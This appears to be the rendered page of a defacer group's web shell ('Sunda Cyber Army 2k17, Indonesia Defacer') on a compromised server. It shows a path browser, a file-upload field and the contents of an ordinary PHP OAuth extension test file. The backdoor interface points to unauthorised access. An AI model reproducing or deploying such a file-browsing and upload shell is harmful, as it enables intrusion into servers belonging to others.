Sunda Cyber Army


* Sunda Cyber Army 2k17 *
Indonesia Defacer ~


Path : /proc/self/root/opt/cpanel/ea-php80/root/usr/share/tests/pecl/oauth/tests/
File Upload :
Current File : //proc/self/root/opt/cpanel/ea-php80/root/usr/share/tests/pecl/oauth/tests/bug21426.phpt

--TEST--
Child class of OAuth cannot access its own attributes
--FILE--
<?php

class Foo extends OAuth
{
    protected $foo = 'bar';

    public function getFoo()
    {
        return $this->foo;
    }
}

$foo = new Foo('key', 'secret');
var_dump($foo->getFoo());

?>
--EXPECTF--
string(3) "bar"